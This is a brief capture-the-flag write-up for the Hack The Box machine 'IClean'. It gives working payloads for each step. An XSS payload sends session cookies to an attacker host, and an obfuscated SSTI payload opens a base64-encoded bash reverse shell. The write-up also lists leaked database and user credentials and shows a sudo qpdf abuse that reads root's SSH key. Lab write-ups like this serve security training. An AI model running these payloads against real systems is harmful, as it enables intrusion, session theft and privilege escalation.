IClean HTB
by kpax
Initial Access
The quote page is susceptible to XSS
Adding this to the service parameter will capture a session cookie
<img src=x onerror=this.src="http://10.10.14.2:8000/?c="+document.cookie>
session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.Zpu0Og.SVSBwcg-U7uq-36NT71QSYGBLw8
SSTI
When generating a QRCode for the invoice, it is susceptible to a SSTI
We can use the following POST data to get a rev shell
invoice_id=&form_type=scannable_invoice&qr_link={{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMi85MDAxICAwPiYx | base64 -d | bash')|attr('read')()}}
Shell as www-data
The app.py has database creds
db_config = {
'host': '127.0.0.1',
'user': 'iclean',
'password': 'pxCsmnGLckUb',
'database': 'capiclean'
}
The user’s table in the database has a hash for consuela that can be found on crackstation as
consuela:simple and clean
SSH shell as Consuela
Consuela can run qpdf as root using sudo
We can use qpdf to attach files to a pdf and then read them on our own machine
sudo /usr/bin/qpdf --empty --add-attachment /root/.ssh/id_rsa -- out.pdf
